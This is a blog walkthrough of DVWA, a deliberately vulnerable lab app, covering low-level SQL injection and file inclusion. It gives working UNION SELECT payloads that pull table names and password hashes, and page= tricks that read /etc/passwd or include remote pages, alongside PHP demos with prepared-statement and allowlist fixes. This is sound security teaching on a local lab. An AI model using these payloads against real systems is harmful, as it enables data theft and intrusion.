After installing DVWA a couple of weeks ago, it would be a waste not to use it. As Anton Chekhov said, “Knowledge is of no value unless you put it into practice”. DVWA is one of the safest places for a pentester to learn: reading and understanding the code to find its vulnerabilities, brute forcing, command injection, and much more. In this post I cover low-level SQL injection and low-level file inclusion.
If you have not installed DVWA yet, please refer to the DVWA installation post. Otherwise, let's start.
First things first, log in to DVWA by entering localhost/login.php in the browser's address bar; the login page below should appear on your screen.
Log in with admin as the username and password as the password (DVWA's default credentials).
Next, the front page of the site lists the vulnerability categories we can use to practise exploiting the application.
On the left side is the list of methods we can try. Before starting, however, we need to set the security level. DVWA provides several levels, from Low to Impossible. Impossible is DVWA's reference implementation of each page with the vulnerability fixed; it is meant as the secure version to compare against, not as a challenge. To set the security level, click the “DVWA Security” button at the bottom left. Below is what that page looks like.
Choose the level and click Submit.
In this post I only cover the two methods mentioned above. Below is the list of the methods covered, along with screenshots.
- SQL Injection (low):
Below is how the SQL injection page looks initially.
If we enter 1' (the digit 1 followed by a single quote) as the user ID, the page shows the database error below. The quote closes the string literal in the query and breaks its syntax, which already tells us the input reaches the database unmodified.
So what actually happened? We can see what happens behind the scenes by clicking the View Source button in the bottom right corner. Below is the source code shown after clicking it.
From the source we can see that the code sends a SELECT statement to the database with the user ID spliced directly into the query string.
If you do not know MariaDB SQL syntax yet, please refer to an SQL tutorial for a better understanding. Knowing the details of SQL syntax and structure is crucial to extracting information with SQL injection.
If you have studied it or already know it, let's continue. From the source we know the code sends this query:
SELECT first_name, last_name FROM users WHERE user_id = '$id';
Since $id is our input, we can modify this query. Below are all the commands I tried.
Entering 1' OR 1 = 1; # as the user ID turns the query into SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1 = 1; #'; and gives:
As you can see, I use # to comment out the unneeded trailing syntax (the closing quote and semicolon from the original query). This means the query that is really executed is:
SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1 = 1;
OR 1 = 1 is true for every row, so every user is returned instead of just user 1.
Now, using the same pattern and a bit more knowledge, we can shape the query however we want.
Below is the command I use to see the MariaDB version in use.
Below is the command to see which database user we are running as.
Below is the command to list all table names in the database.
The table names matter because some tables may hold useful information, such as the users table (assuming the users table stores usernames and passwords).
Below is the command to list all columns of the users table.
Below is the command to get the first name and the password separated by a newline (0x0a). Note that DVWA stores password hashes rather than plaintext, so the values still have to be cracked. So, to get more out of SQL injection, we need to know the structure of the database and the SQL syntax.
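The post shows the payloads only as screenshots. As an added example, not DVWA's code and not the author's screenshots, the script below reproduces the one line of the low-level page that splices the User ID into the query, prints the SQL that MariaDB would receive for each kind of payload used above, and contrasts it with a prepared statement. The second columns chosen for the information_schema payloads (table_schema, data_type) are my choice to satisfy the two-column UNION; the users rows in the SQLite stand-in are constructed sample data.

```php
<?php
// Added example, not DVWA's own code. Shows what the low-level SQL Injection
// page sends to MariaDB for each payload in this post, and the same lookup
// done with a prepared statement so the payloads become inert.

// Same construction as DVWA low: the raw input sits inside single quotes.
function lowLevelQuery(string $id): string
{
    return "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
}

// Each payload closes the quoted literal with ', adds its own SQL, and uses #
// (a MariaDB line comment) to discard the original trailing ';.
// UNION payloads must return two columns to match first_name, last_name.
// The second columns for the information_schema queries are my choice.
function payloads(): array
{
    return [
        'every user'        => "1' OR 1 = 1; #",
        'version and user'  => "1' UNION SELECT version(), user() #",
        'tables in this db' => "1' UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_schema = database() #",
        'columns of users'  => "1' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'users' #",
        'name + password'   => "1' UNION SELECT concat(first_name, 0x0a, password), NULL FROM users #",
    ];
}

// Hardened lookup: the id is validated and bound, never interpolated, so the
// quote and comment characters in the payloads carry no SQL meaning.
function safeLookup(PDO $db, string $id): array
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        return [];
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

foreach (payloads() as $label => $payload) {
    echo "[$label]\n  " . lowLevelQuery($payload) . "\n";
}

// Constructed stand-in for dvwa.users (in-memory SQLite through PDO). The
// MariaDB-specific payloads above are only printed, not run against it.
if (in_array('sqlite', PDO::getAvailableDrivers(), true)) {
    $db = new PDO('sqlite::memory:');
    $db->exec('CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', 'hash1'), (2, 'Gordon', 'Brown', 'gordonb', 'hash2')");

    $attack = "1' OR 1 = 1; #";
    printf("\nprepared, id=1: %d row(s)\n", count(safeLookup($db, '1')));
    printf("prepared, id=%s: %d row(s)\n", $attack, count(safeLookup($db, $attack)));
}
```

Run it with `php sqli_demo.php`. The printed queries make the role of the leading `'` and the trailing `#` visible: without the quote the literal never closes, and without the comment the original `';` would break the syntax just as the lone `1'` did. The prepared version returns one row for `1` and none for the OR payload, because the whole string is compared as a value rather than parsed as SQL.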
- File inclusion (low):
File inclusion lets an attacker make the application include a file of the attacker's choosing, local or remote. Below is an example.
As you can see, the URL has ?page=file1.php: the file to include is taken straight from a query parameter.
From the source code below we can conclude that there is no validation of the file name we put in the URL, so the GET parameter makes the server include anything that exists at that path.
Below is an example of obtaining the passwd file by pointing page= at it, so that its contents are included in the web page.
Below is an example of including a Google search page in the web page. Remote inclusion like this only works because PHP's allow_url_include option is enabled, which DVWA's setup requires.
This means file inclusion is not limited to existing local files; it can pull another web page into the application. By extension, nothing rules out executing PHP just by changing the URL: a remote file containing PHP code is run on the server when it is included.
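As an added example (not DVWA's own source and not the author's screenshots), the script below places the low-level pattern next to an allowlist-based replacement and exercises both against a constructed temporary directory, so it runs offline. The file names file1.php and secret.txt and the directory layout are assumptions for the demo.

```php
<?php
// Added example, not DVWA's own code. includeLow() is the low-level File
// Inclusion pattern (the ?page= value goes straight to include);
// includeSafe() checks an allowlist and the resolved path first.

// Low level: include whatever the client supplied. A path such as
// ../../../../etc/passwd walks out of the web root, and with
// allow_url_include=On an http:// URL is fetched and executed as PHP.
function includeLow(string $page): void
{
    include $page;
}

// Hardened: only known page names, and the resolved path must still sit
// inside $baseDir after symlinks and ../ have been applied.
function resolveSafe(string $page, string $baseDir): ?string
{
    $allowed = ['file1.php', 'file2.php', 'file3.php'];   // DVWA's include pages
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function includeSafe(string $page, string $baseDir): bool
{
    $path = resolveSafe($page, $baseDir);
    if ($path === null) {
        return false;
    }
    include $path;
    return true;
}

// Constructed fixture: pages/file1.php plus a file outside the pages directory.
$root = sys_get_temp_dir() . '/fi_demo_' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/file1.php", "<?php echo \"file1 included\\n\";\n");
file_put_contents("$root/secret.txt", "contents that should never be served\n");
chdir("$root/pages");

// A file with no <?php tag is echoed verbatim, which is exactly why the
// passwd example above shows up on the page.
echo "low,  page=file1.php:          "; includeLow('file1.php');
echo "low,  page=../secret.txt:      "; includeLow('../secret.txt');

echo "safe, page=file1.php:          "; var_dump(includeSafe('file1.php', "$root/pages"));
echo "safe, page=../secret.txt:      "; var_dump(includeSafe('../secret.txt', "$root/pages"));
echo "safe, page=http://google.com/: "; var_dump(includeSafe('http://google.com/', "$root/pages"));

// Clean up the fixture.
chdir(sys_get_temp_dir());
unlink("$root/pages/file1.php");
unlink("$root/secret.txt");
rmdir("$root/pages");
rmdir($root);
```

The allowlist alone would already reject the traversal and the URL; the realpath check is kept as a second layer so that a future entry in the list cannot be abused through a symlink. Turning allow_url_include off in php.ini removes the remote case entirely, which is the setting to use outside a deliberately vulnerable lab like DVWA.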